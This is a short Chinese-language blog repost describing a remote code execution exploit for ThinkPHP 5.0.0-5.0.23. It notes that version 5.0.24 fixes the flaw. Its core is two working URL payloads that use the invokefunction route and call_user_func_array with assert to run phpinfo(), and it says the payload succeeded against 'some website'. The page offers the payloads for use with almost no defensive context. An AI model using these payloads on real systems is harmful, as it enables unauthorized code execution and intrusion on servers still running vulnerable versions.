码迷,mamicode.com
首页 > Web开发 > 详细

ThinkPHP 5.0.0-5.0.23 远程代码执行漏洞利用

时间:2019-07-20 21:42:09      阅读:590      评论:0      收藏:0      [点我收藏+]

标签:mil   info   index   class   div   png   网站   alt   invoke   

漏洞影响范围: 5.0.0-5.0.23

官方已在5.0.24版本修复该漏洞。
测试Payload:

/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()

以某个网站为例,可以看到成功执行phpinfo()函数。

技术图片

技术图片

ThinkPHP 5.0.0-5.0.23 远程代码执行漏洞利用

标签:mil   info   index   class   div   png   网站   alt   invoke   

原文地址:https://www.cnblogs.com/dgjnszf/p/11219030.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!